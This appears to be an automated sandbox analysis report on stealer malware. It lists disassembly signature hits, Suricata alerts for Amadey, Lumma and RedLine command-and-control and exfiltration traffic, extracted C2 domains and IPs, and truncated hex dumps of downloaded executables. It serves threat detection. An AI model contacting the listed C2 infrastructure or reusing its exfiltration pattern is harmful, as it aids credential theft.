Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	23_2_0082A260
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	23_2_0082A260
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then jmp eax	23_2_0082DB81
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov edx, ecx	23_2_00830B14
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx edi, byte ptr [esi+edx-54AE03E6h]	23_2_0082E320
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], FD7B050Ah	23_2_00831B24
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov edx, eax	23_2_00860334
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov edx, ecx	23_2_00863B30
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov edx, ecx	23_2_00840B57
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov word ptr [ecx], bp	23_2_00840B57
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov word ptr [esi], ax	23_2_00840B57
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov edx, ecx	23_2_0085335D
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov edx, ecx	23_2_00840B6E
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov word ptr [ecx], bp	23_2_00840B6E
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov word ptr [esi], ax	23_2_00840B6E
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then jmp eax	23_2_0082DB7B
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ebx, bx	23_2_0084B494
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	23_2_0083C475
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	23_2_008385D0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 3183FE40h	23_2_008385D0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000B9h]	23_2_008385D0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000B9h]	23_2_008385D0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2C5CD9C2h]	23_2_00863DDD
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	23_2_00838510
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	23_2_00851540
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov byte ptr [edi], cl	23_2_00853570
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	23_2_0085BD70
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov word ptr [eax], cx	23_2_008406B0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+06h]	23_2_008406B0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx edx, byte ptr [esp+esi+0C63D06Dh]	23_2_008526B1
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+7B7A28AEh]	23_2_008396D1
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov eax, esi	23_2_0082EEDE
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx edx, byte ptr [esp+esi+0C63D06Dh]	23_2_008526FE
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov edx, ecx	23_2_00863632
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	23_2_0083D670
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-49h]	23_2_0083D670
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7E0BBB3Dh]	23_2_0084EFAA
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then push esi	23_2_0083C7D2
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	23_2_00844FE0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov esi, eax	23_2_00853F09
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov byte ptr [esi], cl	23_2_0083F719
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	23_2_0082F733
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	23_2_00842F40
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	23_2_00862740
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-5062AC8Eh]	23_2_0083FF62

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49915 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059919 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (importenptoc .com) : 192.168.2.5:54022 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059987 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ignoredshee .com) : 192.168.2.5:62632 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49963 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49931
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49996 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.5:50001 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.5:50005 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.5:50008 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50004 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.5:50009 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.5:50002 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2059933 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (voicesharped .com) : 192.168.2.5:60555 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (torpdidebar .com) : 192.168.2.5:62135 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059919 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (importenptoc .com) : 192.168.2.5:58514 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inputrreparnt .com) : 192.168.2.5:64632 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059911 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (breedertremnd .com) : 192.168.2.5:49339 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.5:49400 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50010 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059907 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (actiothreaz .com) : 192.168.2.5:58042 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50018 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059915 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (garulouscuto .com) : 192.168.2.5:53425 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50020 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50023 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz) : 192.168.2.5:63327 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50029 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059431 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mixedrecipew .biz) : 192.168.2.5:59646 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059429 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz) : 192.168.2.5:63884 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059427 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (suggestyuoz .biz) : 192.168.2.5:52248 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.5:55241 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059771 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.5:55241 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059435 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (affordtempyo .biz) : 192.168.2.5:65401 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50035 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059433 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pleasedcfrown .biz) : 192.168.2.5:52958 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.5:55620 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059425 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lightdeerysua .biz) : 192.168.2.5:65209 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50043 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50047 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.5:50051 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:50051 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50053 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059987 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ignoredshee .com) : 192.168.2.5:50692 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50055 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 103.84.89.222:33791 -> 192.168.2.5:50051
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:50051 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2059919 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (importenptoc .com) : 192.168.2.5:52627 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 103.84.89.222:33791 -> 192.168.2.5:50051
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49993 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50002 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50002 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49954 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50014 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50014 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49959 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49954 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49959 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50022 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50022 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50013 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50013 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50009 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50027 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50024 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50024 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50015 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50064 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50064 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50032 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50001 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50001 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50000 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50060 -> 104.21.90.173:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50060 -> 104.21.90.173:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49995 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50046 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50069 -> 104.21.90.173:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50017 -> 172.67.183.104:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50063 -> 104.21.90.173:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50063 -> 104.21.90.173:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50033 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50071 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50037 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50037 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50038 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50038 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50034 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50048 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50061 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50061 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: soulfulimusic.cyou
Source: Malware configuration extractor	URLs: importenptoc.com
Source: Malware configuration extractor	URLs: voicesharped.com
Source: Malware configuration extractor	URLs: inputrreparnt.com
Source: Malware configuration extractor	URLs: torpdidebar.com
Source: Malware configuration extractor	URLs: rebeldettern.com
Source: Malware configuration extractor	URLs: actiothreaz.com
Source: Malware configuration extractor	URLs: garulouscuto.com
Source: Malware configuration extractor	URLs: breedertremnd.com
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199824159981
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: 103.84.89.222:33791

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:35:07 GMTContent-Type: application/octet-streamContent-Length: 379904Last-Modified: Wed, 12 Feb 2025 21:03:48 GMTConnection: keep-aliveETag: "67ad0cb4-5cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d2 20 05 cf 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 8e 00 00 00 08 00 00 00 00 00 00 0e ad 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 ac 00 00 4b 00 00 00 00 c0 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 7d ac 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 8d 00 00 00 20 00 00 00 8e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 c0 00 00 00 06 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 43 4f 44 45 00 00 00 00 32 05 00 00 00 01 00 00 32 05 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:35:11 GMTContent-Type: application/octet-streamContent-Length: 10302976Last-Modified: Fri, 24 Jan 2025 18:07:34 GMTConnection: keep-aliveETag: "6793d6e6-9d3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 16 9d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 24 49 00 00 bc 04 00 00 00 00 00 d0 61 06 00 00 10 00 00 00 f0 94 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 a0 00 00 04 00 00 f7 da 9d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 9c 00 dc 03 00 00 00 60 a0 00 97 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9c 00 6a a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 fa 94 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 22 49 00 00 10 00 00 00 24 49 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 a8 4b 00 00 40 49 00 00 aa 4b 00 00 28 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 93 07 00 00 f0 94 00 00 9e 04 00 00 d2 94 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 90 9c 00 00 04 00 00 00 70 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6a a0 03 